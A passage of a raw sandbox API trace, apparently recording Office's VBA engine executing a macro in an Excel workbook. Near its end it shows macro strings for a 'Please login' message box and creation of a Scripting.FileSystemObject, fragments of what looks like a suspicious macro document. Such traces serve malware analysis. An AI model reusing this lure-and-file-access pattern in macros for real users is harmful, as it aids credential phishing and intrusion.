lpWideCharStr="_B_var_i") returned 9 [0157.544] IUnknown:AddRef (This=0x9ab5f00) returned 0x5 [0157.544] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_i", lHashVal=0x10a209, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.544] IUnknown:Release (This=0x9ab5f00) returned 0x4 [0157.544] IUnknown:AddRef (This=0x9ab4b50) returned 0x14 [0157.544] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_i", lHashVal=0x10a209, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.544] IUnknown:Release (This=0x9ab4b50) returned 0x13 [0157.544] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0157.544] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_i", lHashVal=0x10a209, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.544] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0157.544] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0157.544] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_i", lHashVal=0x10a209, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.545] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0157.545] IUnknown:AddRef (This=0x9ab5f00) returned 0x5 [0157.545] IUnknown:Release (This=0x9ab5f00) returned 0x4 [0157.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a060e, cbMultiByte=9, lpWideCharStr=0x1dc6f0, cchWideChar=10 | out: lpWideCharStr="_B_var_i") returned 9 [0157.545] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_i", lHashVal=0x10a209, wFlags=0x3, ppTInfo=0x1dc6a8, pDescKind=0x1dc6bc, ppFuncDesc=0x1dc6c0, ppVarDesc=0x69005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6a8*=0x0, pDescKind=0x1dc6bc*=0, ppFuncDesc=0x1dc6c0, ppVarDesc=0x69005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.545] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa19eda0, cb=0x400) returned 0xa30c6e0 [0157.545] _mbscpy_s (in: _Dst=0x1dc8b0, _DstSizeInBytes=0x2, _Src=0x5732bfe | out: _Dst=0x1dc8b0) returned 0x0 [0157.545] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b5e50) [0157.545] realloc (_Block=0x0, _Size=0xc0) returned 0x48aaca0 [0157.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961ec8c, cbMultiByte=1, lpWideCharStr=0x670098a, cchWideChar=4 | out: lpWideCharStr="A") returned 1 [0157.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d56, cbMultiByte=7, lpWideCharStr=0x1dc6f0, cchWideChar=8 | out: lpWideCharStr="Celles") returned 7 [0157.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d56, cbMultiByte=7, lpWideCharStr=0x1dc730, cchWideChar=8 | out: lpWideCharStr="Celles") returned 7 [0157.546] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="Celles", lHashVal=0x108554, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d56, cbMultiByte=7, lpWideCharStr=0x1dc730, cchWideChar=8 | out: lpWideCharStr="Celles") returned 7 [0157.546] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="Celles", lHashVal=0x108554, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d56, cbMultiByte=7, lpWideCharStr=0x1dc730, cchWideChar=8 | out: lpWideCharStr="Celles") returned 7 [0157.546] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="Celles", lHashVal=0x108554, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d56, cbMultiByte=7, lpWideCharStr=0x1dc730, cchWideChar=8 | out: lpWideCharStr="Celles") returned 7 [0157.546] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="Celles", lHashVal=0x108554, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.546] IMalloc:Alloc (This=0x7fefecb5380, cb=0xe) returned 0xa2b5e50 [0157.546] _mbscpy_s (in: _Dst=0xa2b5e50, _DstSizeInBytes=0x7, _Src=0x5732d56 | out: _Dst=0xa2b5e50) returned 0x0 [0157.546] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Celles") returned 0x10fffd [0157.546] strcpy_s (in: _Dst=0x1dc840, _DstSize=0xe, _Src="_B_var_Celles" | out: _Dst="_B_var_Celles") returned 0x0 [0157.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc840, cbMultiByte=14, lpWideCharStr=0x1dc690, cchWideChar=14 | out: lpWideCharStr="_B_var_Celles") returned 14 [0157.546] IUnknown:AddRef (This=0x9ab5f00) returned 0x5 [0157.546] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_Celles", lHashVal=0x10fffd, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.546] IUnknown:Release (This=0x9ab5f00) returned 0x4 [0157.546] IUnknown:AddRef (This=0x9ab4b50) returned 0x14 [0157.546] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_Celles", lHashVal=0x10fffd, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.546] IUnknown:Release (This=0x9ab4b50) returned 0x13 [0157.547] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0157.547] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_Celles", lHashVal=0x10fffd, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.547] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0157.547] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0157.547] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_Celles", lHashVal=0x10fffd, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.547] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0157.547] IUnknown:AddRef (This=0x9ab5f00) returned 0x5 [0157.547] IUnknown:Release (This=0x9ab5f00) returned 0x4 [0157.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a063a, cbMultiByte=14, lpWideCharStr=0x1dc6f0, cchWideChar=15 | out: lpWideCharStr="_B_var_Celles") returned 14 [0157.547] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_Celles", lHashVal=0x10fffd, wFlags=0x5, ppTInfo=0x1dc6a8, pDescKind=0x1dc6bc, ppFuncDesc=0x1dc6c0, ppVarDesc=0x43005f00720061, ppTypeComp=0x65006c00000000, pDummy=0x0 | out: ppTInfo=0x1dc6a8*=0x0, pDescKind=0x1dc6bc*=0, ppFuncDesc=0x1dc6c0, ppVarDesc=0x43005f00720061, ppTypeComp=0x65006c00000000, pDummy=0x0) returned 0x0 [0157.547] _mbscpy_s (in: _Dst=0x1dc8b0, _DstSizeInBytes=0x7, _Src=0x5732d56 | out: _Dst=0x1dc8b0) returned 0x0 [0157.547] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b5e50) [0157.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961eca8, cbMultiByte=6, lpWideCharStr=0x67010ba, cchWideChar=14 | out: lpWideCharStr="Sheet2") returned 6 [0157.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732b32, cbMultiByte=13, lpWideCharStr=0x1dc6f0, cchWideChar=14 | out: lpWideCharStr="ThisWorkbook") returned 13 [0157.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732da2, cbMultiByte=7, lpWideCharStr=0x1dc5d0, cchWideChar=8 | out: lpWideCharStr="Sheets") returned 7 [0157.548] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9bcd5d0, cb=0x20) returned 0xa1e6fa0 [0157.548] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa267610, cb=0x28) returned 0xa1e6f10 [0157.549] IMalloc:Realloc (This=0x7fefecb5380, pv=0x7ee9a70, cb=0x100) returned 0xa1cacd0 [0157.550] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.550] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.550] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.550] GetCurrentProcess () returned 0xffffffffffffffff [0157.550] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x4c) returned 1 [0157.550] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.550] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x412) returned 0xa2edb10 [0157.550] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c55820 [0157.550] IMalloc:Alloc (This=0x7fefecb5380, cb=0x318) returned 0x97edf80 [0157.550] IMalloc:Realloc (This=0x7fefecb5380, pv=0x991f240, cb=0x40) returned 0xa222320 [0157.550] IMalloc:Realloc (This=0x7fefecb5380, pv=0x991f1e0, cb=0x50) returned 0x9bae230 [0157.551] IMalloc:Alloc (This=0x7fefecb5380, cb=0x38) returned 0x9ff4090 [0157.551] IMalloc:Realloc (This=0x7fefecb5380, pv=0x97791b0, cb=0xb0) returned 0x9ac66d0 [0157.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_Default", cchWideChar=9, lpMultiByteStr=0x1dc480, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_Default", lpUsedDefaultChar=0x0) returned 9 [0157.551] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Default") returned 0x10c26a [0157.552] strcpy_s (in: _Dst=0x1dc2e0, _DstSize=0x9, _Src="_Default" | out: _Dst="_Default") returned 0x0 [0157.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc2e0, cbMultiByte=9, lpWideCharStr=0x1dc130, cchWideChar=9 | out: lpWideCharStr="_Default") returned 9 [0157.552] IUnknown:AddRef (This=0x9ab5f00) returned 0x5 [0157.552] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_Default", lHashVal=0x10c26a, pfName=0x1dc200, pBstrLibName=0x1dc130 | out: pfName=0x1dc200*=0, pBstrLibName=0x1dc130) returned 0x0 [0157.552] IUnknown:Release (This=0x9ab5f00) returned 0x4 [0157.552] IUnknown:AddRef (This=0x9ab4b50) returned 0x19 [0157.552] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_Default", lHashVal=0x10c26a, pfName=0x1dc200, pBstrLibName=0x1dc130 | out: pfName=0x1dc200*=1, pBstrLibName=0x1dc130) returned 0x0 [0157.552] IUnknown:Release (This=0x9ab4b50) returned 0x18 [0157.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_Default", cchWideChar=-1, lpMultiByteStr=0x1dc2e0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_Default", lpUsedDefaultChar=0x0) returned 9 [0157.552] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Default") returned 0x10c26a [0157.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a066a, cbMultiByte=9, lpWideCharStr=0x1dc2c0, cchWideChar=10 | out: lpWideCharStr="_Default") returned 9 [0157.552] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa1cacd0, cb=0x200) returned 0xa19eda0 [0157.553] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.553] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.553] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.553] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.553] GetCurrentProcess () returned 0xffffffffffffffff [0157.553] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x75) returned 1 [0157.553] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732dca, cbMultiByte=7, lpWideCharStr=0x1dc550, cchWideChar=6 | out: lpWideCharStr="Range") returned 0 [0157.553] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x412) returned 0xa2edf60 [0157.554] wcscpy_s (in: _Destination=0x9c559c0, _SizeInWords=0x6, _Source="Range" | out: _Destination="Range") returned 0x0 [0157.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732df2, cbMultiByte=7, lpWideCharStr=0x1dc550, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0157.554] wcscpy_s (in: _Destination=0x9c559d8, _SizeInWords=0x6, _Source="Value" | out: _Destination="Value") returned 0x0 [0157.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d7e, cbMultiByte=3, lpWideCharStr=0x1dc6f0, cchWideChar=4 | out: lpWideCharStr="A1") returned 3 [0157.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d7e, cbMultiByte=3, lpWideCharStr=0x1dc730, cchWideChar=4 | out: lpWideCharStr="A1") returned 3 [0157.554] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="A1", lHashVal=0x105c6b, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d7e, cbMultiByte=3, lpWideCharStr=0x1dc730, cchWideChar=4 | out: lpWideCharStr="A1") returned 3 [0157.554] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="A1", lHashVal=0x105c6b, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d7e, cbMultiByte=3, lpWideCharStr=0x1dc730, cchWideChar=4 | out: lpWideCharStr="A1") returned 3 [0157.554] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="A1", lHashVal=0x105c6b, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732d7e, cbMultiByte=3, lpWideCharStr=0x1dc730, cchWideChar=4 | out: lpWideCharStr="A1") returned 3 [0157.554] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="A1", lHashVal=0x105c6b, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.554] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa30c6e0, cb=0x800) returned 0xa2dded0 [0157.555] IMalloc:Alloc (This=0x7fefecb5380, cb=0xa) returned 0xa2b5e50 [0157.555] _mbscpy_s (in: _Dst=0xa2b5e50, _DstSizeInBytes=0x3, _Src=0x5732d7e | out: _Dst=0xa2b5e50) returned 0x0 [0157.555] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_A1") returned 0x10f113 [0157.555] strcpy_s (in: _Dst=0x1dc840, _DstSize=0xa, _Src="_B_var_A1" | out: _Dst="_B_var_A1") returned 0x0 [0157.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc840, cbMultiByte=10, lpWideCharStr=0x1dc690, cchWideChar=10 | out: lpWideCharStr="_B_var_A1") returned 10 [0157.555] IUnknown:AddRef (This=0x9ab5f00) returned 0x5 [0157.555] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_A1", lHashVal=0x10f113, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.555] IUnknown:Release (This=0x9ab5f00) returned 0x4 [0157.555] IUnknown:AddRef (This=0x9ab4b50) returned 0x19 [0157.555] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_A1", lHashVal=0x10f113, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.555] IUnknown:Release (This=0x9ab4b50) returned 0x18 [0157.555] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0157.555] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_A1", lHashVal=0x10f113, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.555] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0157.555] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0157.555] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_A1", lHashVal=0x10f113, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.555] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0157.555] IUnknown:AddRef (This=0x9ab5f00) returned 0x5 [0157.555] IUnknown:Release (This=0x9ab5f00) returned 0x4 [0157.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a0696, cbMultiByte=10, lpWideCharStr=0x1dc6f0, cchWideChar=11 | out: lpWideCharStr="_B_var_A1") returned 10 [0157.555] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_A1", lHashVal=0x10f113, wFlags=0x5, ppTInfo=0x1dc6a8, pDescKind=0x1dc6bc, ppFuncDesc=0x1dc6c0, ppVarDesc=0x41005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6a8*=0x0, pDescKind=0x1dc6bc*=0, ppFuncDesc=0x1dc6c0, ppVarDesc=0x41005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.555] _mbscpy_s (in: _Dst=0x1dc8b0, _DstSizeInBytes=0x3, _Src=0x5732d7e | out: _Dst=0x1dc8b0) returned 0x0 [0157.556] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b5e50) [0157.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961ecd0, cbMultiByte=0, lpWideCharStr=0x670234c, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0157.557] _mbscpy_s (in: _Dst=0x1dcb50, _DstSizeInBytes=0x2, _Src=0x5732e1a | out: _Dst=0x1dcb50) returned 0x0 [0157.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961ed14, cbMultiByte=23, lpWideCharStr=0x6702a52, cchWideChar=48 | out: lpWideCharStr="MsgBox ('Please login')") returned 23 [0157.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961ed36, cbMultiByte=26, lpWideCharStr=0x6702cb6, cchWideChar=54 | out: lpWideCharStr="Scripting.FileSystemObject") returned 26 [0157.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732e66, cbMultiByte=13, lpWideCharStr=0x1dc6f0, cchWideChar=14 | out: lpWideCharStr="CreateObject") returned 13 [0157.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732e66, cbMultiByte=13, lpWideCharStr=0x1dc730, cchWideChar=14 | out: lpWideCharStr="CreateObject") returned 13 [0157.558] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="CreateObject", lHashVal=0x108af8, wFlags=0x3, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0xa121118, pDescKind=0x1dc6fc*=1, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.558] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121118, ppTypeAttr=0x1dc6f0, pDummy=0x1 | out: ppTypeAttr=0x1dc6f0, pDummy=0x1) returned 0x0 [0157.558] ITypeInfo:LocalReleaseTypeAttr (This=0xa121118) returned 0x0 [0157.558] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa19eda0, cb=0x400) returned 0xa30c6e0 [0157.558] SysStringByteLen (bstr="") returned 0x0 [0157.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x1dc460, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ÀÅ\x1d", lpUsedDefaultChar=0x0) returned 0 [0157.558] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc490 | out: ppvObject=0x1dc490*=0xa121118) returned 0x0 [0157.558] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121118, memid=1610612738, invkind=1, pFuncIndex=0x1dc488 | out: pFuncIndex=0x1dc488*=0x2) returned 0x0 [0157.558] ITypeInfo2:GetParamCustData (in: This=0xa121118, indexFunc=0x2, indexParam=0x1, GUID=0x7fee51d4e80*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x1dc498 | out: pVarVal=0x1dc498*(varType=0x0, wReserved1=0xa30, wReserved2=0x0, wReserved3=0x0, varVal1=0xa166880, varVal2=0x1dd1a8)) returned 0x0 [0157.558] IUnknown:Release (This=0xa121118) returned 0x1 [0157.559] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc550 | out: ppvObject=0x1dc550*=0xa121118) returned 0x0 [0157.559] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121118, memid=1610612738, invkind=1, pFuncIndex=0x1dc590 | out: pFuncIndex=0x1dc590*=0x2) returned 0x0 [0157.559] ITypeInfo2:GetFuncCustData (in: This=0xa121118, index=0x2, GUID=0x7fee51d3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1dc5a8 | out: pVarVal=0x1dc5a8*(varType=0x0, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x108af8)) returned 0x0 [0157.559] IUnknown:Release (This=0xa121118) returned 0x1 [0157.559] IUnknown:AddRef (This=0xa121118) returned 0x2 [0157.559] ITypeInfo:LocalReleaseFuncDesc (This=0xa121118) returned 0x0 [0157.559] IUnknown:Release (This=0xa121118) returned 0x1 [0157.559] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc818 | out: ppvObject=0x1dc818*=0x0) returned 0x80004002 [0157.559] IUnknown:AddRef (This=0xa121118) returned 0x2 [0157.559] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc7a0 | out: ppvObject=0x1dc7a0*=0x0) returned 0x80004002 [0157.559] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc770 | out: ppvObject=0x1dc770*=0x0) returned 0x80004002 [0157.559] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc760 | out: ppvObject=0x1dc760*=0x0) returned 0x80004002 [0157.559] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc768 | out: ppvObject=0x1dc768*=0x0) returned 0x80004002 [0157.559] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121118, ppTypeAttr=0x1dc798, pDummy=0x10 | out: ppTypeAttr=0x1dc798, pDummy=0x10) returned 0x0 [0157.559] ITypeInfo:LocalReleaseTypeAttr (This=0xa121118) returned 0x0 [0157.559] IUnknown:AddRef (This=0xa121118) returned 0x3 [0157.559] IUnknown:Release (This=0xa121118) returned 0x2 [0157.559] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, 